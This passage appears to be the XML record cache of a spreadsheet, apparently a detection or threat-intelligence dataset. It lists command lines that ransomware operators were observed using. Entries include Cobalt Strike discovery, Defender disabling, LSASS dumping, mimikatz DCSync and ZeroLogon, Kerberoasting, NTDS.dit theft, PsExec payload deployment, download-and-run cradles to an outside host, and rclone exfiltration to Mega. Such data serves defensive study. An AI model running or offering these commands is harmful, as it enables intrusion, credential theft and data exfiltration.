    <s v="nltest /domain_trusts"/>
    <m/>
    <m/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0391"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="nltest /domain_trusts  /all_trusts"/>
    <m/>
    <m/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0392"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="net view /all /domain"/>
    <m/>
    <m/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0393"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="net group &quot;Domain Admins&quot; /domain"/>
    <m/>
    <m/>
    <s v="rundll32.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0394"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="cmd.exe /c whoami /groups"/>
    <m/>
    <m/>
    <s v="icjul.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0395"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="cmd.exe /c dir &amp;homedrive%homepath%"/>
    <m/>
    <m/>
    <s v="icjul.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0396"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="cmd /c query session"/>
    <m/>
    <m/>
    <s v="icjul.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0397"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="cmd /c nltest /dclist"/>
    <m/>
    <m/>
    <s v="icjul.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0398"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="cmd /c nltext /domain_trust"/>
    <m/>
    <m/>
    <s v="icjul.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0399"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="cmd /c net group \&quot;Enterprise Admins\&quot;  /domain"/>
    <m/>
    <m/>
    <s v="icjul.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0400"/>
    <m/>
    <s v="Disco Commands From Beacon"/>
    <s v="cmd /c net group \&quot;Domain Admins\&quot; /domain "/>
    <m/>
    <m/>
    <s v="icjul.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0401"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /c echo 4d64fbbbf34 &gt; \\.\pipe\b4312c"/>
    <s v="C:\Windows\system32\runonce.exe"/>
    <m/>
    <m/>
    <m/>
    <s v="c:\windows\System32\runonce.exe"/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0402"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C gpupdate /force"/>
    <s v="“rundll32.exe” c:\windows\192145.dll,StartW"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0403"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C gpupdate /force"/>
    <s v="C:\Windows\system32\dllhost.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0404"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\cmd.exe /C gpupdate /force"/>
    <s v="C:\Users\USER\AppData\Local\Temp\icju1.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0405"/>
    <m/>
    <m/>
    <s v="cmd.exe /c echo &lt;randomstring&gt; &gt; \&quot;c:\windows\TEMP\dem238D.tmp\&quot; &amp;exit"/>
    <s v="rundll32.exe c:\windows\192145.dll, StartW"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="procc-eid0406"/>
    <m/>
    <m/>
    <s v="Set-MpPreference -DisableRealtimeMonitoring $true"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0407"/>
    <m/>
    <m/>
    <s v="ntdsutil &quot;ac in ntds&quot; &quot;ifm&quot; &quot;cr fu C:\Perflogs\1&quot; q q "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0408"/>
    <m/>
    <m/>
    <s v="systeminfo"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0409"/>
    <m/>
    <m/>
    <s v="nltest /dclist:&lt;hidden&gt;.local"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0410"/>
    <m/>
    <m/>
    <s v="nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0411"/>
    <m/>
    <m/>
    <s v="net localgroup Administrators"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0412"/>
    <m/>
    <m/>
    <s v="whoami.exe&quot; /groups"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0413"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=person)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0414"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=organizationalUnit)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0415"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;objectcategory=computer&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0416"/>
    <m/>
    <m/>
    <s v="adfind.exe -gcb -sc trustdmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0417"/>
    <m/>
    <m/>
    <s v="adfind.exe -f &quot;(objectcategory=group)&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0418"/>
    <m/>
    <m/>
    <s v="adfind.exe -subnets -f (objectCategory=subnet)"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0419"/>
    <m/>
    <m/>
    <s v="adfind.exe -sc trustdmp "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0420"/>
    <m/>
    <m/>
    <s v="Get-NetSubnet"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0421"/>
    <m/>
    <m/>
    <s v="Get-NetComputer –ping "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0422"/>
    <m/>
    <m/>
    <s v="powershell -nop -exec bypass -EncodedCommand"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0423"/>
    <m/>
    <m/>
    <s v="IEX(New - Object Net.Webclient).DownloadString('http://IP:port/')"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0424"/>
    <m/>
    <m/>
    <s v="Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem, LastLogonDate | Export-CSV C:\Users\AllWindows.csv -NoTypeInformation -Encoding UTF8"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0425"/>
    <m/>
    <m/>
    <s v="wmic /node: DEVICE LOCAL process call create &quot;c:\Users\165.bat&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0426"/>
    <m/>
    <m/>
    <s v="start PsExec.exe -accepteula @C:\share$\comps1.txt -u &quot;domain\User&quot; -p &quot;$PASSWORD&quot; cmd /c COPY &quot;\\DOMAINCONTROLLER\share$\fQumH.exe&quot; &quot;C:\windows\temp\&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0427"/>
    <m/>
    <m/>
    <s v="start PsExec.exe -accepteula -d @C:\share$\comps5.txt -u &quot;domain\User&quot; -p &quot;$PASSWORD&quot; cmd /c &quot;C:\windows\temp\fQumH.exe&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0428"/>
    <m/>
    <m/>
    <s v="regsvr32 /s C:\Users\user\appdata\local\temp\random.dll"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0429"/>
    <m/>
    <m/>
    <s v="cmd /c powershell.exe -nop -hidden -c &quot;IEX ((new-object net.webclient).downloadstring('https://onlineworkercz.com:443/ahwjehefj'))&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0430"/>
    <m/>
    <m/>
    <s v="wmic /node: &quot;DEVICE.LOCAL&quot; process call create &quot;c:\Perflogs\procdump.exe -accepteula -ma lsass &quot;c:\PerLogs\lsass.dmp&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0431"/>
    <m/>
    <m/>
    <s v="esentutl /p /o c:\Users\user\AppData\Local\Temp\grabber_temp.edb"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0432"/>
    <m/>
    <m/>
    <s v="c:\windows\system32\cmd.exe /c echo b30f789ed5b &gt; \\. \pipe\2b5fe9 "/>
    <m/>
    <m/>
    <s v="wuauclt.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="procc-eid0433"/>
    <m/>
    <m/>
    <s v="shell net localgroup administrators"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0434"/>
    <m/>
    <m/>
    <s v="shell whoami"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0435"/>
    <m/>
    <m/>
    <s v="shell whoami /groups"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0436"/>
    <m/>
    <m/>
    <s v="shell net group &quot;Enterprise Admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0437"/>
    <m/>
    <m/>
    <s v="shell net group &quot;Domain Computers&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0438"/>
    <m/>
    <m/>
    <s v="net computers"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0439"/>
    <m/>
    <m/>
    <s v="powershell-import /home/user/work/ShareFinder.ps1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0440"/>
    <m/>
    <m/>
    <s v="psinject 1234 x64 Invoke-ShareFinder -CheckAdmin -Verbose | Out- File -Encoding ascii C:\ProgramData\sh.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0441"/>
    <m/>
    <m/>
    <s v="psinject 5209 x64 Invoke-ShareFinder -CheckShareAccess -Verbose | Out-File -Encoding ascii C:\ProgramData\shda.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0442"/>
    <m/>
    <m/>
    <s v="powershell-import /home/user/work/Invoke-Kerberoast.ps1"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0443"/>
    <m/>
    <m/>
    <s v="psinject 4728 x64 Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\pshashes.txt -append -force - Encoding UTF8"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0444"/>
    <m/>
    <m/>
    <s v="execute-assembly /home/user/work/Rubeus.exe kerberoast /ldapfilter:'admincount=1' /format:hashcat /outfile:C:\ProgramData\hashes.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0445"/>
    <m/>
    <m/>
    <s v="execute-assembly /home/user/work/Rubeus.exe asreproast /format:hashcat /outfile:C:\ProgramData\asrephashes.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0446"/>
    <m/>
    <m/>
    <s v="log nameoflog.log"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0447"/>
    <m/>
    <m/>
    <s v="privilege::debug_x000a_"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0448"/>
    <m/>
    <m/>
    <s v="lsadump::dcsync /user:Administrator"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0449"/>
    <m/>
    <m/>
    <s v="sekurlsa::pth /user: /domain: /ntlm: /run:cmd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0450"/>
    <m/>
    <m/>
    <s v="procdump.exe -acceptula -ma lsass.exe C:\compaq\lsass.dmp procdump64.exe -acceptula -ma lsass.exe C:\compaq\lsass.dmp"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0451"/>
    <m/>
    <m/>
    <s v="mimikatz lsadump::zerologon /target:[controller.domain.local] /account:[controller]$/exploit"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0452"/>
    <m/>
    <m/>
    <s v="mimikatz lsadump::zerologon /target:DC01.contoso.com /account:DC01$ /exploit"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0453"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID C:\ProgramData\lsass.dmp full"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0454"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell wmic /node:[target] process call create &quot;cmd /c rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump PID"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0455"/>
    <m/>
    <m/>
    <s v="powershell-import /tmp/Fast-Guide/Invoke-SMBAutoBrute.ps1 psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList &quot;Password1,"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0456"/>
    <m/>
    <m/>
    <s v="powershell Invoke-Nightmare -NewUser &quot;HACKER&quot; -NewPassword &quot;FUCKER&quot; -DriverName &quot;Xeroxxx&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0457"/>
    <m/>
    <m/>
    <s v="net user OldAdmin 1Q2w3E4r5T6y /add"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0458"/>
    <m/>
    <m/>
    <s v="net localgroup Administrators OldAdmin /ADD"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0459"/>
    <m/>
    <m/>
    <s v="https://github.com/rsmudge/ZeroLogon-BOF"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0460"/>
    <m/>
    <m/>
    <s v="dcsync domain.local"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0461"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell AGENT_INSTALLER.msi"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0462"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell nltest /domain_trusts /all_trusts"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0463"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell wmic /node:&quot;DC01&quot; /user:&quot;DOMAIN\admin&quot; /password:&quot;cleartextpass&quot; process call create &quot;cmd /c vssadmin list shadows &gt;&gt; c:\log.txt&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0464"/>
    <m/>
    <m/>
    <s v="net start Volume Shadow Copy"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0465"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell wmic /node:&quot;DC01&quot; /user:&quot;DOMAIN\admin&quot; /password:&quot;cleartextpass&quot; process call create &quot;cmd /c vssadmin create shadow /for=C: 2&gt;&amp;1&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0466"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell wmic /node:&quot;DC01&quot; /user:&quot;DOMAIN\admin&quot; /password:&quot;cleartextpass&quot; process call create &quot;cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\NTDS\NT DS.dit c:\temp\log\ &amp; copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SYSTEM c:\temp\log\ &amp; copy\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy55\Windows\System32\config\SECURITY c:\temp\log\&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0467"/>
    <m/>
    <m/>
    <s v="Esentutl /p C:\log\ntds.dit"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0468"/>
    <m/>
    <m/>
    <s v="C:\programdata\netscan"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0469"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell netscan.exe /hide /auto:&quot;resuult.xml&quot; /config:netscan.xml /file:range.txt"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0470"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="beacon&gt; shell net group &quot;domain admins&quot; /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0471"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="beacon&gt; shell net user ebernardo /domain"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0472"/>
    <m/>
    <m/>
    <s v="execute-assembly /home/user/soft/scripts/SharpView.exe Find- DomainUserLocation -UserIdentity gpetit"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0473"/>
    <m/>
    <m/>
    <s v="execute-assembly C:\Users\Андрей\Soft\Hacking\SharpView.exe Find-DomainUserLocation -UserIdentity gpetit"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0474"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell net view \\172.16.1.40 /ALL"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0475"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell dir \\172.16.1.40\c$"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0476"/>
    <m/>
    <m/>
    <s v="\\172.16.1.40\c$\Users\gpetit\AppData\Local\Filezilla_x000a_\\172.16.1.40\c$\Users\gpetit\AppData\Roaming\Filezilla"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0477"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell rclone.exe copy &quot;шара&quot; Mega:training -q --ignore-existing --auto-confirm --multi-thread-streams 1 --transfers 3 --bwlimit 5M"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0478"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell rclone.exe copy &quot;\\WTFINANCE.washoetribe.net\E$\FINANCE&quot; mega:1 -q --ignore-existing --auto-confirm --multi-thread-streams 1 --transfers 3 --bwlimit 5M"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0479"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell rclone.exe copy &quot;\\trucamtldc01\E$\Data&quot; remote:Data -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0480"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell rclone.exe copy &quot;\\FS\&quot; remote:NT -q --ignore-existing --auto-confirm --multi-thread- streams 12 --transfers 12"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0481"/>
    <m/>
    <s v="cobalt strike shell = cmd.exe /c"/>
    <s v="shell rclone.exe copy &quot;\\PETERLENOVO.wist.local\Users&quot; ftp1:uploads/Users/ -q --ignore-existing --auto-confirm --multi-thread-streams 3 --transfers 3"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0482"/>
    <m/>
    <m/>
    <s v="start PsExec.exe /accepteula @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c COPY &quot;\\PRIMARY DOMAIN CONTROLLER\share$\fx166.exe&quot; &quot;C:\windows\temp\&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0483"/>
    <m/>
    <m/>
    <s v="start PsExec.exe -d @C:\share$\comps1.txt -u DOMAIN\ADMINISTRATOR -p PASSWORD cmd /c c:\windows\temp\fx166.exe"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0484"/>
    <m/>
    <m/>
    <s v="start wmic /node:@C:\share$\comps1.txt /user:&quot;DOMAIN\Administrator&quot; /password:&quot;PASSWORD&quot; process call create &quot;cmd.exe /c bitsadmin /transfer fx166\\DOMAIN CONTROLLER share$\fx166.exe %APPDATA%\fx166.exe&amp;%APPDATA%\fx166.exe&quot;"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0485"/>
    <m/>
    <m/>
    <s v="powershell Set-MpPreference -DisableRealtimeMonitoring $true"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0486"/>
    <m/>
    <m/>
    <s v="New-ItemProperty -Path &quot;HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender&quot; -Name_x000a_DisableAntiSpyware -Value 1 -PropertyType DWORD - Force"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0487"/>
    <m/>
    <m/>
    <s v="sekurlsa::logonpasswords"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0488"/>
    <m/>
    <m/>
    <s v="token::elevate"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0489"/>
    <m/>
    <m/>
    <s v="lsadump::sam"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0490"/>
    <m/>
    <m/>
    <s v="reg add &quot;HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server&quot; /v fAllowToGetHelp /t REG_DWORD /d 1 /f"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="procc-eid0491"/>
    <m/>
    <m/>
    <s v="C:\Windows\system32\svchost.exe -k UnistackSvcGroup"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="procc-eid0492"/>
    <m/>
    <m/>
    <s v="taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
